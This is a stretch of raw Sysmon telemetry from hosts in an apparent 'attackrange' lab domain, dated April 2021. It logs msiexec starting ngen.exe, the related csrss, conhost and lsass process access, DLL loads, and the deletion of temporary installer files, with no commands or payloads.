14:57:19.296{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBCF-607E-B20B-00000000BB01}3784c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073490Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.296{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073489Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.296{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073488Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.296{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073487Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.296{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073486Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.296{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073485Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.296{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073484Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.265{A7A01FEF-EBCF-607E-AF0B-00000000BB01}7044C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073483Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.265{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-AF0B-00000000BB01}7044c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073482Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.265{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBCF-607E-AF0B-00000000BB01}7044c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073481Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.218{A7A01FEF-EBCF-607E-B00B-00000000BB01}50721572C:\Windows\system32\conhost.exe{A7A01FEF-EBCF-607E-AF0B-00000000BB01}7044c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073480Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.218{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-B00B-00000000BB01}5072C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073479Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.202{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBCF-607E-AF0B-00000000BB01}7044c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073478Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.202{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBCF-607E-AF0B-00000000BB01}7044c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000073477Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.202{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSIBB6C.tmpMD5=FCCDC45CA17E5180B40EFC28052BAC39,SHA256=4AB37B0F9C5FE3505E1ECFE0764AAA04838CF81F9E0A402425E057F7A251E621,IMPHASH=620AD7AB8901854C91622E052544AEE7truetrue 23542300x800000000000000073476Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.171{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF02D30E373B3B673E.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000073475Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.171{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF115C424B7115EDA9.TMPMD5=B3F7231D990E9A11ACBAE66F0CBBF569,SHA256=664590109A9E037830A96692F89409EE4D94F9E0C9C3D87B4F8BFACD502873B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073474Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.171{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFDD1B2DC7577AF5B7.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000073473Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.171{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF2DF039C27CBFEACC.TMPMD5=B3F7231D990E9A11ACBAE66F0CBBF569,SHA256=664590109A9E037830A96692F89409EE4D94F9E0C9C3D87B4F8BFACD502873B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073472Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:19.171{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI86A2.tmpMD5=91BD5C854AC96F4DFC07AC56E00F7E94,SHA256=031E1D952F568E34586929FE9FDE9A6EAE06856AF228046830DE47E46CC77CE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050248Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:19.891{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6C83813E1180F14A17CCB385F19B8D5,SHA256=D0C25502852942E92382318C72032FC785F94C7659E2B6ECC7ABA64479901E4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050247Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:19.469{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4D3FBC889C7F234B01B5256AD1D3F03F,SHA256=102C96337E93942FF2FE81F0D7A4D350909BBC8B722298C1353A0C0DB46958DD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000073788Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.968{A7A01FEF-EBD0-607E-010C-00000000BB01}45085600C:\Windows\system32\conhost.exe{A7A01FEF-EBD0-607E-000C-00000000BB01}6556c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073787Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.968{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-010C-00000000BB01}4508C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073786Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.968{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-000C-00000000BB01}6556c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073785Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.968{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD0-607E-000C-00000000BB01}6556c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073784Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.952{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-FE0B-00000000BB01}3500c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073783Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.952{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD0-607E-FE0B-00000000BB01}3500c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073782Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.952{A7A01FEF-EBD0-607E-FE0B-00000000BB01}3500C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073781Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.936{A7A01FEF-EBD0-607E-FF0B-00000000BB01}63484820C:\Windows\system32\conhost.exe{A7A01FEF-EBD0-607E-FE0B-00000000BB01}3500c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073780Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.921{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-FF0B-00000000BB01}6348C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073779Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.921{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD0-607E-FE0B-00000000BB01}3500c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073778Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:20.921{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD0-607E-FE0B-00000000BB01}3500c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073777Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 